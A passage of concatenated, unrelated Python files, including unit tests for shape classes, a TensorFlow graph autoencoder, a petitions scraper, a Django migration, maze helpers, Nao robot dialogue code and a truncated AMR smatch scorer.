                    (val, i) = self.eval(s, i + 1)
                res = res + val if op == '+' else res - val
        return (res, i)


print(Solution().calculate('4-5+6'))
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:Segment.py
# @Author: Michael.liu
# @Date:2019/2/12
# @Desc: NLP Segmentation ToolKit - Hanlp Python Version

# Greeting banner printed on module start-up.
for _message in ("Hello World!", "this is search & rec"):
    print(_message)
|
#!/usr/bin/python
from models.base import Base
import json
import unittest
from models.square import Square
from models.rectangle import Rectangle
import pep8
from os import path
class TestCodeFormat(unittest.TestCase):
    """PEP8 conformance checks driven by the (third-party) pep8 tool.

    NOTE(review): total_errors is asserted to equal 1, i.e. each file is
    expected to carry exactly one known style violation -- confirm this is
    intentional rather than a placeholder for 0.
    """
    def test_pep8_conformance(self):
        """Test that we conform to PEP8."""
        pep8style = pep8.StyleGuide(quiet=True)
        # Paths are relative to the test runner's working directory.
        result = pep8style.check_files(['../../models/base.py'])
        self.assertEqual(result.total_errors, 1,
                         "Found code style errors (and warnings).")
    def test_pep8_conformance_test(self):
        """Test that we conform to PEP8."""
        pep8style = pep8.StyleGuide(quiet=True)
        result = pep8style.check_files(
            ['../../tests/test_models/test_base.py'])
        self.assertEqual(result.total_errors, 1,
                         "Found code style errors (and warnings).")
class test_base(unittest.TestCase):
    """Tests for base class.

    Fixes over the original:
      * the shadowed duplicate ``test_to_json_string`` was renamed to
        ``test_to_json_string_type_error`` so both tests actually run
        (previously the later definition silently replaced the earlier one);
      * ``no_doc`` now imports ``inspect`` locally (it was never imported
        at module level and would have raised NameError when called).
    """
    def no_doc(item):
        """A decorator to add the no-doc docstring
        objects that don't need any other documentation"""
        import inspect  # fix: 'inspect' is not imported at module level
        t = "class" if inspect.isclass(item) else "function"
        item.__doc__ = "This {} intentionally has no documentation".format(t)
    def test_base(self):
        """Test base"""
        base = Base(1)
        self.assertEqual(base.id, 1)
    def test_wrong(self):
        """Test base, there is only one exception raised for None"""
        '''base = Base()
        self.assertEqual(base.id, 1)'''
        base2 = Base([1, 2, 3])
        self.assertEqual(base2.id, [1, 2, 3])
        base3 = Base("ate")
        self.assertEqual(base3.id, "ate")
        '''base4 = Base(None)
        self.assertEqual(base4.id, 2)'''
        base5 = Base(True)
        self.assertEqual(base5.id, True)
    def test_to_json_string_type_error(self):
        """Test function to_json_string that
        converts a dict or list of dicts to a string
        (renamed from the shadowed duplicate test_to_json_string)"""
        square = Square(1, 2, 3)
        self.assertEqual(Base.to_json_string(None), "[]")
        r1 = Rectangle(10, 7, 2, 8, 1)
        r1_dict = r1.to_dictionary()
        self.assertEqual(r1_dict, {'x': 2, 'width': 10,
                                   'id': 1, 'height': 7, 'y': 8})
        with self.assertRaises(TypeError):
            Base.to_json_string()
    def test_to_dictionary(self):
        """Test if the output is correct: it returns the class properties"""
        r1 = Rectangle(10, 7, 0, 0)
        r1_dict = r1.to_dictionary()
        self.assertIs(type(r1_dict), dict)
    def test_to_json_string(self):
        """Test for conversion of Base subclasses to json representation.
        Assumes that subclasses have implemented `to_dictionary()` method.
        If Rectangle class is not available do not run this test.
        """
        self.assertEqual(Base.to_json_string(None), "[]")
        self.assertEqual(Base.to_json_string([]), "[]")
        with self.subTest():
            r1 = Rectangle(10, 7, 2, 8, 1)
            r1_dict = r1.to_dictionary()
            json_dict = Base.to_json_string([r1_dict])
            self.assertEqual(r1_dict, {'x': 2, 'width': 10,
                                       'id': 1, 'height': 7,
                                       'y': 8})
            self.assertIs(type(r1_dict), dict)
            self.assertIs(type(json_dict), str)
            self.assertEqual(json.loads(json_dict), json.loads('[{"x": 2, '
                                                               '"width": 10, '
                                                               '"id": 1, '
                                                               '"height": 7, '
                                                               '"y": 8}]'))
    def test_create_rectangle_original(self):
        """Test for function create that returns an instance of a class"""
        r1 = Rectangle(3, 5, 1, 2, 7)
        r1_dictionary = r1.to_dictionary()
        r2 = Rectangle.create(**r1_dictionary)
        self.assertEqual("[Rectangle] (7) 1/2 - 3/5", str(r1))
    def test_create_rectangle_new(self):
        """Test if new values are assigned to the new instance"""
        r1 = Rectangle(3, 5, 1, 2, 7)
        r1_dictionary = r1.to_dictionary()
        r2 = Rectangle.create(**r1_dictionary)
        self.assertEqual("[Rectangle] (7) 1/2 - 3/5", str(r2))
    def test_create_rectangle_is(self):
        """Test if both class instances are the same"""
        r1 = Rectangle(3, 5, 1, 2, 7)
        r1_dictionary = r1.to_dictionary()
        r2 = Rectangle.create(**r1_dictionary)
        self.assertIsNot(r1, r2)
    def test_create_rectangle_equals(self):
        """Test if both class instances are the same"""
        r1 = Rectangle(3, 5, 1, 2, 7)
        r1_dictionary = r1.to_dictionary()
        r2 = Rectangle.create(**r1_dictionary)
        self.assertNotEqual(r1, r2)
    def test_create_square_original(self):
        """"Test for function create that returns an instance of a class"""
        s1 = Square(3, 5, 1, 7)
        s1_dictionary = s1.to_dictionary()
        s2 = Square.create(**s1_dictionary)
        self.assertEqual("[Square] (7) 5/1 - 3", str(s1))
    def test_create_square_new(self):
        """Test if new values are assigned to the new instance"""
        s1 = Square(3, 5, 1, 7)
        s1_dictionary = s1.to_dictionary()
        s2 = Square.create(**s1_dictionary)
        self.assertEqual("[Square] (7) 5/1 - 3", str(s2))
    def test_create_square_is(self):
        """Test if both class instances are the same"""
        s1 = Square(3, 5, 1, 7)
        s1_dictionary = s1.to_dictionary()
        s2 = Square.create(**s1_dictionary)
        self.assertIsNot(s1, s2)
    def test_create_square_equals(self):
        """Test if values are the same between both dictionaries"""
        s1 = Square(3, 5, 1, 7)
        s1_dictionary = s1.to_dictionary()
        s2 = Square.create(**s1_dictionary)
        self.assertNotEqual(s1, s2)
    def test_load_from_file(self):
        """With a class"""
        r1 = Rectangle(2, 3)
        if not path.exists("Rectangle.json"):
            lists = Rectangle.load_from_file()
            self.assertEqual(lists, [])
    def test_load_from_existing_file(self):
        """Tests if function loads from existing file"""
        r1 = Rectangle(3, 4)
        r1_json = Rectangle.save_to_file([r1])
        with open("Rectangle.json", "r") as f:
            self.assertEqual([r1.to_dictionary()], json.load(f))
    def test_load_from_existing_file_(self):
        """Tests if function loads from existing file"""
        r1 = Square(3)
        r1_json = Square.save_to_file([r1])
        with open("Square.json", "r") as f:
            self.assertEqual([r1.to_dictionary()], json.load(f))
    def test_load_from_file_(self):
        """With a class"""
        r1 = Square(2)
        if not path.exists("Square.json"):
            lists = Square.load_from_file()
            self.assertEqual(lists, [])
    def test_save_to_file(self):
        """Tests if function saves into a file"""
        s1 = Square(3)
        s1_json = Square.save_to_file([s1])
        with open("Square.json", "r") as f:
            self.assertEqual([s1.to_dictionary()], json.load(f))
|
from app.utils.constant import GCN_VAE, SUPPORTS, MODE, TRAIN, NORMALISATION_CONSTANT, LOSS, ACCURACY
from app.model.aemodel import base_model
from app.layer.GC import SparseGC
from app.layer.IPD import InnerProductDecoder
import tensorflow as tf
import numpy as np
class Model(base_model.Base_Model):
    '''Class for GCN Model (variational graph auto-encoder flavour).

    Encodes node features with graph convolutions into a Gaussian latent
    (mean + log-sigma heads), samples z, and decodes an adjacency matrix
    with an inner-product decoder.
    '''
    def __init__(self, model_params, sparse_model_params, placeholder_dict, autoencoder_model_params):
        super(Model, self).__init__(model_params=model_params,
                                    sparse_model_params=sparse_model_params,
                                    placeholder_dict=placeholder_dict,
                                    autoencoder_model_params = autoencoder_model_params)
        self.name = GCN_VAE
        # We feed in the adjacency matrix in the sparse format and then make it dense
        # We need the mode variable to know if we need to use the mask values.
        # Since we use almost the entire adjacency matrix at training time, it is inefficient to use a mask
        # parameter at training time.
        # Latent-head tensors/layers are populated by model_op().
        self.mean_encoding = None
        self.log_sigma_encoding = None
        self.mean_encoder = None
        self.log_sigma_encoder = None
        self.z = None
        self.decoder = None
        self.node_count = autoencoder_model_params.node_count
        self.model_op()
    def _loss_op(self):
        '''Operator to compute the loss for the model.
        This method should not be directly called the variables outside the class.
        Note we do not need to initialise the loss as zero for each batch as process the entire data in just one batch.'''
        # Computing the KL loss analytically boils down to KL divergence between two gaussians as
        # computed here: https://arxiv.org/pdf/1312.6114.pdf (page 11)
        # Why do we have a normalisation constant in the kl_loss?
        # The reconstruction loss was normalized with respect to both the input size (node_count)
        # and input dimensionality (again node_count as it is basically an adjacency matrix).
        # So we normalize one more time with respect to node_count
        kl_loss = 0.5 * tf.reduce_mean(input_tensor=(tf.reduce_sum(input_tensor=(-2*self.log_sigma_encoding
                                                                                 + tf.square(tf.exp(self.log_sigma_encoding))
                                                                                 + tf.square(self.mean_encoding)
                                                                                 - 1),
                                                                   axis=1)))/self.node_count
        # Reconstruction (likelihood) term comes from the base model.
        liklihood_loss = super(Model, self)._loss_op()
        return liklihood_loss + kl_loss
    def _mean_encoder_op(self):
        '''Component of the encoder op which learns the mean'''
        # Linear (identity activation) graph-conv head.
        return SparseGC(input_dim=self.model_params.hidden_layer1_size,
                        output_dim=self.model_params.hidden_layer2_size,
                        supports=self.supports,
                        dropout_rate=self.dropout_rate,
                        activation=lambda x: x,
                        sparse_features=False,
                        num_elements=self.num_elements)
    def _log_sigma_encoder_op(self):
        '''Component of the encoder op which learns the log of sigma'''
        # Same architecture as the mean head, separate weights.
        return SparseGC(input_dim=self.model_params.hidden_layer1_size,
                        output_dim=self.model_params.hidden_layer2_size,
                        supports=self.supports,
                        dropout_rate=self.dropout_rate,
                        activation=lambda x: x,
                        sparse_features=False,
                        num_elements=self.num_elements)
    def _layers_op(self):
        '''Operator to build the layers for the model.
        This function should not be called by the variables outside the class and
        is to be implemented by all the subclasses.
        This function implemenetation is different from the other _layer_ops as now our model is not sequential.'''
        # Shared first graph-conv layer feeding both latent heads.
        self.layers.append(SparseGC(input_dim=self.input_dim,
                                    output_dim=self.model_params.hidden_layer1_size,
                                    supports=self.supports,
                                    dropout_rate=self.dropout_rate,
                                    activation=tf.nn.relu,
                                    sparse_features=self.model_params.sparse_features,
                                    num_elements=self.num_elements))
        self.mean_encoder = self._mean_encoder_op()
        self.log_sigma_encoder = self._log_sigma_encoder_op()
        self.decoder = InnerProductDecoder(input_dim=self.input_dim,
                                           output_dim=self.input_dim,
                                           dropout_rate=self.dropout_rate,
                                           activation=lambda x: x,
                                           sparse_features=False)
        # The output of the GCN-AE model is always an adjacency matrix
    def model_op(self):
        '''Operator to build the network.
        This function should be called by the variables outside the class.
        We can not use the model_op from the base class as now it is not just a sequential model.'''
        scope_name = self.name + "_var_to_save"
        with tf.variable_scope(name_or_scope=scope_name):
            self._layers_op()
            self.vars = {var.name: var for var in
                         tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=scope_name)}
            # self._save_op()
        self.activations = [self.inputs]
        # Run the shared (sequential) stack first.
        for layer in self.layers:
            self.activations.append(
                layer(self.activations[-1])
            )
        # Activations is a list of the form input::first_common_hidden_layer::..::last_common_hidden_layer
        self.mean_encoding = self.mean_encoder(self.activations[-1])
        self.log_sigma_encoding = self.log_sigma_encoder(self.activations[-1])
        # Reparameterised sample of the latent variables.
        self.z = tf.random_normal(shape=[self.node_count, self.model_params.hidden_layer2_size],
                                  mean=self.mean_encoding,
                                  stddev=tf.exp(self.log_sigma_encoding))
        self.outputs = self.decoder(self.z)
        self._compute_metrics()
        self.optimizer_op = self._optimizer_op()
    def _compute_metrics(self):
        '''Method to compute the metrics of interest'''
        self.predictions = self._prediction_op()
        self.loss = self._loss_op()
        self.accuracy = self._accuracy_op()
        # Latent sample doubles as the node embeddings.
        self.embeddings = self.z
        tf.summary.scalar(LOSS, self.loss)
        tf.summary.scalar(ACCURACY, self.accuracy)
        self.summary_op = tf.summary.merge_all()
|
from datetime import datetime
def timer(func):
    """Decorator: print how long each call took (in milliseconds) and
    return the wrapped function's result unchanged."""
    from functools import wraps  # local import keeps this block self-contained

    @wraps(func)  # preserve __name__/__doc__ of the decorated function
    def wrapper(*args, **kwargs):
        start = datetime.now()
        result = func(*args, **kwargs)
        end = datetime.now()
        # Fix: 'miliseconds' -> 'milliseconds' in the report line.
        print(func.__qualname__, args, "took \t\t",
              (end-start).total_seconds() * 1000, "milliseconds")
        return result
    return wrapper
def timer_noresult(func):
    """Decorator: run *func*, fully materialise its (possibly lazy) result
    via list(), and return the elapsed time in milliseconds instead of the
    result. Useful for timing generator-producing functions."""
    from functools import wraps  # local import keeps this block self-contained

    @wraps(func)  # fix: preserve the wrapped function's metadata
    def wrapper(*args, **kwargs):
        start = datetime.now()
        # The result is intentionally discarded; list() forces generators
        # to run to completion so the timing is meaningful.
        list(func(*args, **kwargs))
        end = datetime.now()
        return (end-start).total_seconds() * 1000
    return wrapper
|
# -*- coding: UTF-8 -*-
import datetime
from urllib import request
from bs4 import BeautifulSoup
if __name__ == "__main__":
    url = 'https://petitions.whitehouse.gov/'
    req = request.Request(url)
    response = request.urlopen(req)
    html = response.read().decode('utf-8')
    # Parse the page with BeautifulSoup (lxml backend).
    soup = BeautifulSoup(html, 'lxml')
    # Locate the petition node by its data-nid and read its signature count.
    tag = soup.find(attrs={"data-nid": "2545476"})
    count = tag.find("span", attrs={"class": "signatures-number"}).string
    now = datetime.datetime.now()
    dead_line = datetime.datetime.strptime(
        '2017-06-18', '%Y-%m-%d')
    delta = dead_line - now
    # Percentage of the 30-day signing window already elapsed
    # (NOTE(review): assumes the window opened 30 days before the deadline).
    per = (30 - delta.days) / 30 * 100
    print(" all_count : %s" % count)
    print("remain_days : %d" % delta.days)
    print("    percent : %.2f%%" % per)
|
# Generated by Django 2.1.3 on 2018-11-06 10:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: adds staff.date_joined and
    staff.security_group, and makes staff.email unique."""
    dependencies = [
        ('core', '0017_staff'),
    ]
    operations = [
        migrations.AddField(
            model_name='staff',
            name='date_joined',
            field=models.DateTimeField(auto_now_add=True, null=True),
        ),
        migrations.AddField(
            model_name='staff',
            name='security_group',
            # SET_NULL keeps staff rows alive if their group is deleted.
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.SecurityGroup'),
        ),
        migrations.AlterField(
            model_name='staff',
            name='email',
            field=models.EmailField(max_length=254, unique=True),
        ),
    ]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 3 01:36:01 2018
@author: Iswariya Manivannan
"""
import os, sys
def maze_map_to_tree(maze_map):
    """Function to create a tree from the map file. The idea is
    to check for the possible movements from each position on the
    map and encode it in a data structure like list.

    Parameters
    ----------
    maze_map : list
        The list of text lines making up the maze.

    Returns
    -------
    dict_tree : dictionary
        Keys are (row, col) tuples for every walkable cell (' ' or the
        start marker 's'); values are the four neighbour tuples in the
        order [left, up, right, down].
    """
    dict_tree = {}
    for row in range(0, len(maze_map)):
        for col in range(0, len(maze_map[row])):
            # Fix: the original condition `== ' ' or 's'` was always true
            # ('s' is truthy), so wall cells were added to the tree too.
            if maze_map[row][col] in (' ', 's'):
                left = (row, col - 1)
                right = (row, col + 1)
                up = (row - 1, col)
                down = (row + 1, col)
                dict_tree.update({(row, col): [left, up, right, down]})
    return dict_tree
def assign_character_for_nodes(maze_map, current_node, prev_node):
    """Mark the current cell with a glyph showing the traversal direction.

    Parameters
    ----------
    maze_map : list
        The maze map as a list of row strings.
    current_node : tuple
        (row, col) of the current position.
    prev_node : tuple
        (row, col) of the previous position.

    Returns
    -------
    list
        The same maze_map list, with the cell at current_node replaced by
        a box-drawing character when the step direction is recognised and
        the cell is an open space (' ').
    """
    # Direction of travel -> box-drawing glyph (up, right, down, left).
    glyphs = {
        (-1, 0): '\u2534',
        (0, 1): '\u251c',
        (1, 0): '\u252c',
        (0, -1): '\u2524',
    }
    direction = (current_node[0] - prev_node[0], current_node[1] - prev_node[1])
    row_chars = list(maze_map[current_node[0]])
    print(row_chars)
    if direction in glyphs and maze_map[current_node[0]][current_node[1]] == ' ':
        row_chars[current_node[1]] = glyphs[direction]
        maze_map[current_node[0]] = ''.join(row_chars)
    return maze_map
def write_to_file(file_name, path):
    """Persist every step of *path* into *file_name*.

    Each item is rendered with "%s" formatting and written back-to-back,
    with no separators, in traversal order.

    Parameters
    ----------
    file_name : string
        Name of the output txt file.
    path : iterable
        Sequence of steps/snapshots to persist.
    """
    rendered = ["%s" % step for step in path]
    with open(file_name, 'w') as handle:
        handle.writelines(rendered)
def start_pose(maze_map):
    '''
    :param maze_map: list
        The list of the text
    :return: tuple
        The (row, col) of the start marker 's', or None when absent
    '''
    for row_idx, line in enumerate(maze_map):
        for col_idx, cell in enumerate(line):
            if cell == 's':
                return (row_idx, col_idx)
def print_maze(maze_map):
    '''
    Render the maze_map rows back-to-back on stdout (rows already carry
    their own newlines, so nothing extra is appended).
    :param maze_map: list
        Input the maze_map as list
    :return: None
    '''
    for line in maze_map:
        sys.stdout.write(str(line))
def clear_screen():
    # Clear the terminal: 'cls' on Windows ('nt'), 'clear' elsewhere.
    os.system('cls' if os.name == 'nt' else 'clear')
|
# -*- coding: utf-8 -*-
import NaoCreator.Tool.wikipediator as w
import NaoCreator.Tool.speech_move as sm
import NaoCreator.SpeechToText.nao_listen as nl
import NaoSensor.outils as o
import NaoSensor.plant as p
def get_wikipedia_answer(info):
    """
    Look the user's question up on (French) Wikipedia and speak the first
    sentence of the matching page; apologize when the lookup fails.

    :param info: message spoken by the user
    :return: None
    """
    sm.speech_and_move(u"Désolé cette information m'est inconnue, je te redirige sur wikipédia.")
    try:
        # First sentence = text before the first period of the page summary.
        resum = w.get_resum(info, w.FRENCH).split(".")
        sm.speech_and_move(u"Voici la réponse a ta question. {}".format(resum[0]))
    except Exception:
        # FIX: the bound exception variable `e` was never used, so it is dropped.
        # Any failure (page not found, network error, ...) ends with an apology.
        sm.speech_and_move(u"Je n'ai pas réussi à trouver la réponse à ta question sur Wikipédia !")
def explication(msg):
    """
    Check whether the message mentions an item from our databases (plants or
    tools) and, if so, start the interactive explanation; otherwise redirect
    the question to Wikipedia.

    :param msg: message spoken by the user
    :return: None
    """
    # FIX: renamed `list`/`list2`, which shadowed the builtin `list`.
    plants = p.Plant.get_plantes_obj()
    tools = o.Outils.get_outils_obj()
    redirection = False
    # Scan both collections for an item whose name appears in the message.
    for item in plants + tools:
        if item.get_data("nom") in msg:
            explication_obj(msg, item)
            redirection = True
            break
    # No matching database entry: fall back to Wikipedia.
    if not redirection:
        get_wikipedia_answer(msg)
def explication_obj(msg, obj):
    """
    Walk through the database record matched for *obj*, answering the user's
    follow-up questions about its fields until the user says "non".

    :param msg: message spoken by the user
    :param obj: matched database object (plant or tool) exposing get_data()/data
    :return: None
    """
    sm.speech_and_move(u"redirecion sur explicator effectuée !")
    sm.speech_and_move(u"Quelles informations désires-tu sur {} {}"
                       .format(obj.get_data(obj.__class__.DETERMINANT), obj.get_data(obj.__class__.NOM)))
    # Field names available on this record.
    list_obj = ["{}".format(key) for key in obj.data]
    sm.speech_and_move(u"Tu peux avoir des informations sur {}".format(list_obj))
    # Listen for the user's first question.
    question = nl.nao_listen()
    # Keep answering while the user has not said "non".
    while "non" not in question:
        trouve = False
        # Check each word of the user's sentence against the record's fields.
        for mot in question.split():
            if mot in list_obj:
                sm.speech_and_move(u"{} : {}".format(mot, obj.get_data(mot)))
                trouve = True
        # If no field answered the question, fall back to Wikipedia.
        if not trouve:
            get_wikipedia_answer(question)
        sm.speech_and_move(u"Voudrais tu d'autres infos ? Non si tu veux quitter, "
                           u"et un autre mot clé si tu veux continuer.")
        question = nl.nao_listen()
|
# Filters a list of readings: values that stay within `d` of their
# predecessor are dropped while the run is at most `k` long; the first and
# last samples are always kept.  (NOTE(review): exact intended semantics
# inferred from the code — confirm against the original problem statement.)
data = [13, 15, 14, 17, 18, 16, 16]
d = 2  # maximum absolute difference treated as "close"
k = 1  # allowed length of a run of close values before one is kept
answer = []  # surviving samples
del_count = 0  # length of the current run of close values
pre_data = 0  # previous sample; 0 doubles as the "unset" sentinel
for i, da in enumerate(data):
    if i == 0 :
        # Always keep the first sample.
        answer.append(da)
        continue
    if pre_data == 0:
        pre_data = da
    else:
        if del_count > k:
            # Run exceeded k: keep the previous sample and reset the run.
            answer.append(pre_data)
            pre_data = da
            del_count = 0
        else:
            if abs(pre_data - da) <= d:
                # Close to the previous value: extend the run (drop pre_data).
                del_count += 1
                pre_data = da
            else:
                # Jumped by more than d: keep the previous sample.
                del_count = 0
                answer.append(pre_data)
                pre_data = da
    if len(data)- 1 == i:
        # Always keep the last sample.
        answer.append(da)
print(answer)
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
"""
This script computes smatch score between two AMRs.
For detailed description of smatch, see http://www.isi.edu/natural-language/amr/smatch-13.pdf
"""
import sys, json, argparse
from fast_smatch import amr
from fast_smatch._smatch import get_best_match, compute_f
from amr_parser.bert_utils import BertEncoderTokenizer
# Total number of restarts+1 used by the hill-climbing smatch computation;
# overwritten in main() from the -r command-line option.
iteration_num = 5
# verbose output switch.
# Default false (no verbose output); set by -v in main().
verbose = False
# single score output switch.
# Default true (compute a single score for all AMRs in two files);
# cleared by --ms in main().
single_score = True
# precision and recall output switch.
# Default false (do not output precision and recall, just output F score);
# set by --pr in main().
pr_flag = False
# Error log location
ERROR_LOG = sys.stderr
# Debug log location
DEBUG_LOG = sys.stderr
def get_amr_line(input_f):
    """
    Read the next AMR from *input_f* (an iterable of lines).

    AMRs are separated by blank lines; comment lines starting with "#" are
    skipped.  The AMR's lines are concatenated (no separator) into a single
    string, which is empty once the input is exhausted.  The AMR is not
    validated here.
    """
    fragments = []
    seen_content = False
    for raw_line in input_f:
        stripped = raw_line.strip()
        if not stripped:
            # Blank line: skip leading blanks, otherwise the AMR is complete.
            if seen_content:
                break
            continue
        if stripped.startswith("#"):
            # Comment line inside the AMR file.
            continue
        seen_content = True
        fragments.append(stripped)
    return "".join(fragments)
def build_arg_parser():
    """
    Build the command-line argument parser for the smatch calculator
    (argparse; requires Python 2.7+).
    """
    arg_parser = argparse.ArgumentParser(description="Smatch calculator -- arguments")
    arg_parser.add_argument(
        '-f', nargs=2, required=True, type=argparse.FileType('r', encoding='utf-8'),
        help='Two files containing AMR pairs. AMRs in each file are separated by a single blank line')
    arg_parser.add_argument(
        '-r', type=int, default=4,
        help='Restart number (Default:4)')
    arg_parser.add_argument(
        '-v', action='store_true',
        help='Verbose output (Default:false)')
    arg_parser.add_argument(
        '--ms', action='store_true', default=False,
        help='Output multiple scores (one AMR pair a score)'
             'instead of a single document-level smatch score (Default: false)')
    arg_parser.add_argument(
        '--pr', action='store_true', default=False,
        help="Output precision and recall as well as the f-score. Default: false")
    return arg_parser
def print_alignment(mapping, instance1, instance2):
    """
    Render a node mapping as a readable alignment string.

    Args:
        mapping: current node mapping list; mapping[i] is the index of the
            AMR-2 node aligned to AMR-1 node i, or -1 for unaligned.
        instance1: instance triples (relation, node name, concept) of AMR 1
        instance2: instance triples of AMR 2
    Returns:
        A space-separated string like "a0(dog)-b0(canine) a1(cat)-Null".
    """
    pieces = []
    for idx, mapped in enumerate(mapping):
        source = instance1[idx][1] + "(" + instance1[idx][2] + ")"
        if mapped == -1:
            pieces.append(source + "-Null")
        else:
            target = instance2[mapped][1] + "(" + instance2[mapped][2] + ")"
            pieces.append(source + "-" + target)
    return " ".join(pieces)
def print_errors(mapping, amr1, amr2, prefix1, prefix2):
    """Mark which triples of two AMRs are matched under *mapping*.

    amr1/amr2 are (instances, attributes, relations) triple lists as returned
    by AMR.get_triples(); prefix1/prefix2 are the node-name prefixes ("a"/"b")
    stripped to recover integer node indices.

    NOTE(review): every reporting statement below is commented out, so this
    function currently computes the *_match flag lists and produces no output
    and no return value.
    """
    (instance1, attribute1, relation1) = amr1
    (instance2, attribute2, relation2) = amr2
    # Per-triple "was matched" flags for both AMRs.
    inst1_match = [False for x in instance1]
    attr1_match = [False for x in attribute1]
    rel1_match = [False for x in relation1]
    inst2_match = [False for x in instance2]
    attr2_match = [False for x in attribute2]
    rel2_match = [False for x in relation2]
    # An instance matches when a mapping exists and the concept names agree.
    for i in range(0, len(instance1)):
        if mapping[i] != -1:
            if instance1[i][2].lower() == instance2[mapping[i]][2].lower():  # exists a mapping, and the names match
                inst1_match[i] = True
                inst2_match[mapping[i]] = True
        # else:
        # print "Incorrect aligned concept: ", instance1[i][2], "->", instance2[mapping[i]][2].lower()
    for i in range(0, len(attribute1)):
        for j in range(0, len(attribute2)):
            # if both attribute relation triple have the same relation name and value
            if attribute1[i][0].lower() == attribute2[j][0].lower() \
                    and attribute1[i][2].lower() == attribute2[j][2].lower():
                # Node index = node name with the prefix stripped (e.g. "a3" -> 3).
                node1_index = int(attribute1[i][1][len(prefix1):])
                node2_index = int(attribute2[j][1][len(prefix2):])
                # if the mapping is correct
                if mapping[node1_index] == node2_index:
                    attr1_match[i] = True
                    attr2_match[j] = True
    for i in range(0, len(relation1)):
        for j in range(0, len(relation2)):
            # if both relations share the same name
            if relation1[i][0].lower() == relation2[j][0].lower():
                node1_index_amr1 = int(relation1[i][1][len(prefix1):])
                node1_index_amr2 = int(relation2[j][1][len(prefix2):])
                node2_index_amr1 = int(relation1[i][2][len(prefix1):])
                node2_index_amr2 = int(relation2[j][2][len(prefix2):])
                # A relation matches only when BOTH endpoint mappings agree.
                if mapping[node1_index_amr1] == node1_index_amr2 and mapping[node2_index_amr1] == node2_index_amr2:
                    rel1_match[i] = True
                    rel2_match[j] = True
    # for i in range(0, len(instance1)):
    #     if not inst1_match[i]:
    #         print "Incorrect concept: ", instance1[i][2]
    # for i in range(0, len(instance2)):
    #     if not inst2_match[i]:
    #         print "Missing concept: ", instance2[i][2]
    # for i in range(0, len(attribute1)):
    #     if not attr1_match[i]:
    #         print "Incorrect attribute: ", attribute1[i][0], attribute1[i][2]
    # for i in range(0, len(attribute2)):
    #     if not attr2_match[i]:
    #         print "Missing attribute: ", attribute2[i][0], attribute2[i][2]
    # for i in range(0, len(relation1)):
    #     if not rel1_match[i]:
    #         node1 = int(relation1[i][1][len(prefix1):])
    #         node2 = int(relation1[i][2][len(prefix1):])
    #         print "Incorrect relation: ", instance1[node1][2], ":"+relation1[i][0], instance1[node2][2]
    # for i in range(0, len(relation2)):
    #     if not rel2_match[i]:
    #         node1 = int(relation2[i][1][len(prefix2):])
    #         node2 = int(relation2[i][2][len(prefix2):])
    #         print "Missing relation: ", instance2[node1][2], ":"+relation2[i][0], instance2[node2][2]
def main(arguments):
    """
    Main function of smatch score calculation.

    Reads AMR pairs from the two files in ``arguments.f``, computes the best
    variable mapping per pair, and prints either one score per pair (--ms)
    or a single document-level score.

    BUG FIX: the body previously read the module-global ``args`` (defined only
    in the __main__ block) instead of the ``arguments`` parameter, so main()
    could not be called programmatically; all uses now go through
    ``arguments``.  The unused BertEncoderTokenizer construction (which could
    crash when ./bert-base-cased is absent) was also removed.
    """
    global verbose
    global iteration_num
    global single_score
    global pr_flag
    # set the iteration number
    # total iteration number = restart number + 1
    iteration_num = arguments.r + 1
    if arguments.ms:
        single_score = False
    if arguments.v:
        verbose = True
    if arguments.pr:
        pr_flag = True
    # matching triple number
    total_match_num = 0
    # triple number in test file
    total_test_num = 0
    # triple number in gold file
    total_gold_num = 0
    # sentence number
    sent_num = 1
    # Read amr pairs from two files
    while True:
        cur_amr1 = get_amr_line(arguments.f[0])
        cur_amr2 = get_amr_line(arguments.f[1])
        if cur_amr1 == "" and cur_amr2 == "":
            break
        if cur_amr1 == "":
            print("Error: File 1 has less AMRs than file 2", file=ERROR_LOG)
            print("Ignoring remaining AMRs", file=ERROR_LOG)
            break
        if cur_amr2 == "":
            print("Error: File 2 has less AMRs than file 1", file=ERROR_LOG)
            print("Ignoring remaining AMRs", file=ERROR_LOG)
            break
        amr1 = amr.AMR.parse_AMR_line(cur_amr1)
        amr2 = amr.AMR.parse_AMR_line(cur_amr2)
        prefix1 = "a"
        prefix2 = "b"
        # Rename node to "a1", "a2", .etc
        amr1.rename_node(prefix1)
        # Renaming node to "b1", "b2", .etc
        amr2.rename_node(prefix2)
        (instance1, attributes1, relation1) = amr1.get_triples()
        (instance2, attributes2, relation2) = amr2.get_triples()
        if verbose:
            # print parse results of two AMRs
            print("AMR pair", sent_num, file=DEBUG_LOG)
            print("============================================", file=DEBUG_LOG)
            print("AMR 1 (one-line):", cur_amr1, file=DEBUG_LOG)
            print("AMR 2 (one-line):", cur_amr2, file=DEBUG_LOG)
            print("Instance triples of AMR 1:", len(instance1), file=DEBUG_LOG)
            print(instance1, file=DEBUG_LOG)
            print("Attribute triples of AMR 1:", len(attributes1), file=DEBUG_LOG)
            print(attributes1, file=DEBUG_LOG)
            print("Relation triples of AMR 1:", len(relation1), file=DEBUG_LOG)
            print(relation1, file=DEBUG_LOG)
            print("Instance triples of AMR 2:", len(instance2), file=DEBUG_LOG)
            print(instance2, file=DEBUG_LOG)
            print("Attribute triples of AMR 2:", len(attributes2), file=DEBUG_LOG)
            print(attributes2, file=DEBUG_LOG)
            print("Relation triples of AMR 2:", len(relation2), file=DEBUG_LOG)
            print(relation2, file=DEBUG_LOG)
        (best_mapping, best_match_num) = get_best_match(instance1, attributes1, relation1,
                                                        instance2, attributes2, relation2,
                                                        prefix1, prefix2, verbose=verbose)
        if verbose:
            print("best match number", best_match_num, file=DEBUG_LOG)
            print("best node mapping", best_mapping, file=DEBUG_LOG)
            print("Best node mapping alignment:", print_alignment(best_mapping, instance1, instance2), file=DEBUG_LOG)
        test_triple_num = len(instance1) + len(attributes1) + len(relation1)
        gold_triple_num = len(instance2) + len(attributes2) + len(relation2)
        print_errors(best_mapping, (instance1, attributes1, relation1), (instance2, attributes2, relation2), prefix1,
                     prefix2)
        if not single_score:
            # if each AMR pair should have a score, compute and output it here
            (precision, recall, best_f_score) = compute_f(best_match_num,
                                                          test_triple_num,
                                                          gold_triple_num,
                                                          verbose)
            if pr_flag:
